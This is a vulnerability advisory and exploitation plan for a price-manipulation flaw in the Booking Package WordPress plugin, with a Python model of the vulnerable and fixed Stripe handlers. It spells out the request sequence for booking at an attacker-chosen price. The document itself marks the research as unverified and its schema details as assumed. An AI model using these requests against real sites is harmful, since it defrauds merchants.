# CVE-2026-4911: Booking Package <= 1.7.06 - Unauthenticated Price Manipulation via 'amount' Parameter

## Record

- **CVE:** CVE-2026-4911
- **URL slug:** booking-package-unauthenticated-price-manipulation-via-amount-parameter
- **Plugin slug:** booking-package (theme slug: none)
- **Affected versions:** <= 1.7.06
- **Patched in:** 1.7.07 (days to patch: 1)
- **Severity:** medium, CVSS 5.3
- **CVSS vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
- **Vulnerability type:** External Control of Assumed-Immutable Web Parameter
- **Published:** 2026-04-27 18:18:55
- **Updated:** 2026-04-28 06:45:49
- **References:** https://www.wordfence.com/threat-intel/vulnerabilities/id/61d63c5a-6ca6-42d8-ab0a-152d9c95945c?source=api-prod
- **Trac patch URL:** none recorded

### Files changed between 1.7.06 and 1.7.07

- index.php
- js/Booking_app.js
- js/Calendar.js
- languages/booking-package.pot
- lib/Documents.php
- lib/Schedule.php
- lib/Setting.php
- readme.txt

Note that `lib/CreditCard.php`, where the description locates the commented-out amount check, is not among the files listed as changed between the two tags. Confirm the fix directly in the 1.7.07 source (links below) before relying on the patched-version claim.

### Research and PoC status

- **Research status:** researched (3 rounds completed); **not verified**
- **Research summary, vulnerable code, fix diff, exploit outline:** none recorded
- **Research model:** gemini-3-flash-preview, started 2026-05-04 18:14:27, completed 2026-05-04 18:14:57, no error
- **PoC:** none recorded (no video, steps, script, exploit code, trace, WordPress/PHP version or verification depth); exploit code gated: false

### Source links

- **Type:** plugin
- **Vulnerable version:** 1.7.06
  - browse: https://plugins.trac.wordpress.org/browser/booking-package/tags/1.7.06
  - zip: https://downloads.wordpress.org/plugin/booking-package.1.7.06.zip
- **Fixed version:** 1.7.07
  - browse: https://plugins.trac.wordpress.org/browser/booking-package/tags/1.7.07
  - zip: https://downloads.wordpress.org/plugin/booking-package.1.7.07.zip
- **All tags:** https://plugins.trac.wordpress.org/browser/booking-package/tags

## Description

The Booking Package plugin for WordPress is vulnerable to price manipulation in versions up to, and including, 1.7.06. The `intentForStripe()` function passes the user-controlled `$_POST['amount']` directly to the Stripe PaymentIntent API without validation, and the `commitStripe()` function ignores the server-calculated amount when confirming the payment. The server does calculate the booking cost correctly via `getAmount()` from services, guests, taxes and coupons, but that value is never compared against the PaymentIntent or used to update it, because the code in `lib/CreditCard.php` that would write the calculated amount into the PaymentIntent update is commented out.

This makes it possible for unauthenticated attackers to book services at arbitrary prices (e.g., $0.01 instead of $500.00) by manipulating the `amount` parameter during PaymentIntent creation and then completing the booking with the underpaid payment.

# Exploitation Research Plan: CVE-2026-4911 (Booking Package Price Manipulation)

## 1. Vulnerability Summary
The **Booking Package** plugin (<= 1.7.06) contains a flaw in its Stripe payment integration. The plugin lets the client specify the payment amount when a Stripe `PaymentIntent` is created via the `intentForStripe()` function, without validating it against the server-side calculated cost of the booking. Furthermore, the `commitStripe()` function, which finalizes the booking after payment confirmation, fails to verify that the amount actually paid matches the required cost for the selected services, guests and taxes. The validation code in `lib/CreditCard.php` is explicitly commented out in the vulnerable versions.

## 2. Attack Vector Analysis
- **Endpoint:** `wp-admin/admin-ajax.php`
- **Action:** `package_app_public_action` (registered via the `BOOKING_PACKAGE` class in `index.php`)
- **Internal Action (Sub-type):** `intentForStripe` and `commitStripe` (passed in the POST body)
- **Vulnerable Parameter:** `amount` (used during `intentForStripe`)
- **Authentication:** Unauthenticated. The AJAX action is registered via `wp_ajax_nopriv_package_app_public_action`.
- **Preconditions:**
    - A booking calendar must be configured and published via shortcode.
    - At least one service with a cost > $0.00 must exist.
    - Stripe payment must be enabled (even in test mode).

## 3. Code Flow
1. **Entry Point:** The browser sends an AJAX POST request to `admin-ajax.php` with `action=package_app_public_action`.
2. **Routing:** In `index.php`, the `$action_public` hook triggers a handler (likely within a dynamically included class, or handled via a switch in `index.php` or `Schedule.php`).
3. **Intent Creation (`intentForStripe`):**
    - The request reaches `lib/CreditCard.php -> intentForStripe()`.
    - It reads `$_POST['amount']`.
    - It calls the Stripe API to create a `PaymentIntent` with this user-supplied amount.
    - **Vulnerability:** There is no check comparing `$_POST['amount']` to the result of `getAmount()`.
4. **Finalization (`commitStripe`):**
    - After the user "pays", the browser calls `commitStripe` to finalize the booking.
    - `commitStripe()` verifies with Stripe that the `PaymentIntent` has status `succeeded`.
    - **Vulnerability:** It does not check whether the `amount` of the successful `PaymentIntent` matches the cost calculated by `getAmount()`.

## 4. Nonce Acquisition Strategy
The plugin localizes a `reservation_info` object into the page containing the booking shortcode.

1. **Shortcode Identification:** The plugin uses `[booking_package id=X]`.
2. **Page Creation:** Use WP-CLI to create a page with a valid calendar ID (usually `1` for the first calendar).
   ```bash
   wp post create --post_type=page --post_status=publish --post_title="Booking" --post_content='[booking_package id=1]'
   ```
3. **Extraction:**
   - Navigate to the newly created page.
   - Use `browser_eval` to extract the required identifiers from the global `reservation_info` object.
   - **Identifiers to extract:**
     - `window.reservation_info.nonce`
     - `window.reservation_info.action` (should be `package_app_public_action`)
     - `window.reservation_info.accountKey` (the calendar ID)

## 5. Exploitation Strategy
The goal is to book an expensive service for $0.01 (1 cent).

### Step 1: Create Stripe Intent with Manipulated Amount
- **Method:** POST
- **URL:** `http://localhost:8080/wp-admin/admin-ajax.php`
- **Body (URL-encoded):**
  - `action`: `package_app_public_action`
  - `nonce`: `[EXTRACTED_NONCE]`
  - `type`: `intentForStripe`
  - `amount`: `1` (Stripe amounts are integers in the smallest currency unit, so `1` is $0.01 for USD; Stripe's own minimum charge for USD is $0.50, so a live Stripe backend may reject `1` while still accepting, for example, `50`, which demonstrates the same flaw)
  - `currency`: `usd` (or as per calendar settings)
  - `calendar_id`: `1`
- **Expected Response:** A JSON object containing a `client_secret` from Stripe.

### Step 2: "Payment" (Simulated)
In a real attack, the attacker would use the `client_secret` to complete the payment via Stripe's JS SDK using a test card or a real card for the $0.01. For the PoC, since we cannot interact with Stripe's actual backend in an isolated environment, we look for the transition to `commitStripe`.

### Step 3: Finalize Booking
- **Method:** POST
- **URL:** `http://localhost:8080/wp-admin/admin-ajax.php`
- **Body (URL-encoded):**
  - `action`: `package_app_public_action`
  - `nonce`: `[EXTRACTED_NONCE]`
  - `type`: `commitStripe`
  - `payment_intent_id`: `[ID_FROM_STEP_1]`
  - `booking_data`: `[JSON_DATA_OF_BOOKING]`
- **Note:** In the vulnerable version, `commitStripe` sees a succeeded PaymentIntent for $0.01 and finalizes the booking without comparing that amount to the calculated cost.

## 6. Test Data Setup
The table and option names used below are assumptions about the plugin's schema; confirm them against the plugin source (the 1.7.06 tag linked above) before running the commands.

1. **Create Calendar:** Ensure a calendar exists (Calendar ID 1).
2. **Create Service:** Add a service to the calendar with a high price.
   ```bash
   # Use SQL to verify/insert a service with price 10000 (cents)
   wp db query "UPDATE wp_booking_package_services SET cost = 10000 WHERE id = 1;"
   ```
3. **Enable Stripe:** Set a dummy Stripe key to satisfy plugin checks.
   ```bash
   wp option update booking_package_stripe_secret_key "sk_test_4eC39HqLyjWDarjtT1zdp7dc"
   wp option update booking_package_stripe_publishable_key "pk_test_TYooMQauvdEDq54NiTphI7jx"
   ```

## 7. Expected Results
- The request to `intentForStripe` should return a success status with a Stripe `client_secret`, even though the `amount` provided (1) is far lower than the service cost (10000).
- The plugin should not return an error such as "Invalid amount" or "Price mismatch".

## 8. Verification Steps
After the exploit attempts, check the booking records in the database:
```bash
# Check the latest booking amount
wp db query "SELECT * FROM wp_booking_package_bookings ORDER BY id DESC LIMIT 1;"
```
Confirm that the `total_price` or recorded payment in the database reflects the manipulated price ($0.01) while the service booked was the $100.00 service.

## 9. Alternative Approaches
If `intentForStripe` requires more complex `booking_data`, capture a legitimate request first using `browser_navigate` and network monitoring.

1. Navigate to the booking page.
2. Fill out the form normally.
3. Use `browser_eval` to intercept the call to `booking_Package.intentForStripe`, or monitor the `fetch`/`XHR` requests.
4. Replay the request with the `amount` modified to `1`.
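To make the two-step flaw from sections 1 and 3 concrete, the following Python model puts the vulnerable `intentForStripe`/`commitStripe` pair beside a hardened pair and replays the section 5 request sequence against both. This is an added illustration for this advisory, not the plugin's code: the three function names are taken from the advisory, while `FakeStripe`, the request dictionaries, the price table, the tax and coupon rules and the per-calendar currency are constructed for the example and are assumptions about how the plugin works. The hardened `commitStripe` also refuses a PaymentIntent that has already been consumed, which the advisory does not discuss but which the same check naturally covers.

```python
"""Vulnerable and hardened models of the Booking Package Stripe flow.

Added illustration for this advisory, not plugin code. intentForStripe,
commitStripe and getAmount are the names the advisory uses; FakeStripe, the
request dicts, the price table, the tax/coupon rules and CALENDAR_CURRENCY
are constructed here and are assumptions about the plugin.
"""
from dataclasses import dataclass
from decimal import Decimal, ROUND_HALF_UP
import itertools

# Stripe amounts are integers in the smallest currency unit; these currencies have none.
ZERO_DECIMAL = {"bif", "clp", "djf", "gnf", "jpy", "kmf", "krw", "mga", "pyg",
                "rwf", "ugx", "vnd", "vuv", "xaf", "xof", "xpf"}
CALENDAR_CURRENCY = "usd"              # assumed: configured by the site owner, never by the client
SERVICES = {1: Decimal("500.00")}      # constructed: service_id -> per-guest price
TAX_RATE = Decimal("0.10")             # constructed: 10 % tax on the discounted subtotal
COUPONS = {"HALF": Decimal("0.50")}    # constructed: coupon code -> discount fraction


def to_minor_units(price, currency: str) -> int:
    """Convert a decimal price to the integer amount Stripe expects for the currency."""
    scale = Decimal(1) if currency.lower() in ZERO_DECIMAL else Decimal(100)
    return int((Decimal(price) * scale).quantize(Decimal(1), rounding=ROUND_HALF_UP))


def getAmount(booking: dict, currency: str) -> int:
    """Server-side cost: per-guest price x guests, coupon, then tax, in minor units."""
    subtotal = SERVICES[booking["service_id"]] * booking["guests"]
    subtotal *= Decimal(1) - COUPONS.get(booking.get("coupon"), Decimal(0))
    return to_minor_units(subtotal * (Decimal(1) + TAX_RATE), currency)


@dataclass
class PaymentIntent:
    id: str
    amount: int
    currency: str
    status: str = "requires_payment_method"


class FakeStripe:
    """In-process stand-in for the PaymentIntent API. Real Stripe also enforces a
    per-currency minimum charge (USD 0.50); this model only rejects amounts below 1."""

    def __init__(self):
        self._intents, self._ids = {}, itertools.count(1)

    def create(self, amount: int, currency: str) -> PaymentIntent:
        if amount < 1:
            raise ValueError("amount below minimum")
        pi = PaymentIntent(f"pi_{next(self._ids)}", amount, currency.lower())
        self._intents[pi.id] = pi
        return pi

    def retrieve(self, pi_id: str) -> PaymentIntent:
        return self._intents[pi_id]

    def confirm(self, pi_id: str) -> None:
        """The customer (or attacker) completing payment through Stripe.js."""
        self._intents[pi_id].status = "succeeded"


# Vulnerable flow (CVE-2026-4911): the client chooses the amount and nobody compares it.
def intentForStripe_vulnerable(post: dict, stripe: FakeStripe) -> PaymentIntent:
    return stripe.create(int(post["amount"]), post["currency"])   # $_POST['amount'] used as-is


def commitStripe_vulnerable(post: dict, stripe: FakeStripe, bookings: list) -> dict:
    pi = stripe.retrieve(post["payment_intent_id"])
    if pi.status != "succeeded":
        raise ValueError("payment not completed")
    record = {"intent": pi.id, "paid": pi.amount, **post["booking_data"]}  # amount never checked
    bookings.append(record)
    return record


# Hardened flow: only the server's price reaches Stripe, and it is re-checked on commit.
def intentForStripe_fixed(post: dict, stripe: FakeStripe) -> PaymentIntent:
    amount = getAmount(post["booking_data"], CALENDAR_CURRENCY)   # post["amount"] is ignored
    return stripe.create(amount, CALENDAR_CURRENCY)


def commitStripe_fixed(post: dict, stripe: FakeStripe, bookings: list) -> dict:
    pi = stripe.retrieve(post["payment_intent_id"])
    expected = getAmount(post["booking_data"], CALENDAR_CURRENCY)
    if pi.status != "succeeded":
        raise ValueError("payment not completed")
    if (pi.amount, pi.currency) != (expected, CALENDAR_CURRENCY):
        raise ValueError(f"price mismatch: paid {pi.amount} {pi.currency}, expected {expected}")
    if any(b["intent"] == pi.id for b in bookings):
        raise ValueError("payment intent already consumed")       # one payment, one booking
    record = {"intent": pi.id, "paid": pi.amount, **post["booking_data"]}
    bookings.append(record)
    return record


def attack(intent_fn, commit_fn, amount: str = "1", submissions: int = 1) -> list:
    """Replay the section 5 sequence against a handler pair; one outcome tuple per commit:
    ("booked", amount_paid) or ("rejected", reason)."""
    stripe, bookings, outcomes = FakeStripe(), [], []
    booking = {"service_id": 1, "guests": 1, "coupon": None}
    pi = intent_fn({"amount": amount, "currency": "usd", "booking_data": booking}, stripe)
    stripe.confirm(pi.id)                  # the attacker pays whatever the intent asks for
    for _ in range(submissions):
        try:
            rec = commit_fn({"payment_intent_id": pi.id, "booking_data": booking}, stripe, bookings)
            outcomes.append(("booked", rec["paid"]))
        except ValueError as exc:
            outcomes.append(("rejected", str(exc)))
    return outcomes


if __name__ == "__main__":
    print("vulnerable pair        :", attack(intentForStripe_vulnerable, commitStripe_vulnerable))
    print("fixed pair             :", attack(intentForStripe_fixed, commitStripe_fixed))
    print("forged intent vs fixed :", attack(intentForStripe_vulnerable, commitStripe_fixed))
```

Against the vulnerable pair the replay books the $500 service for one unit; against the fixed pair the same request is booked only at the server's 55000 (the $500 service plus 10 % tax), because the client's `amount` never reaches Stripe. The third run matters for the patch review: even if an attacker obtains a succeeded one-unit PaymentIntent some other way, a `commitStripe` that compares amount and currency against `getAmount()` rejects it, so the commit-side check is worth adding independently of the intent-side fix. The currency comparison is deliberate, since an attacker who can choose `currency` could otherwise pay the right number in a cheaper unit.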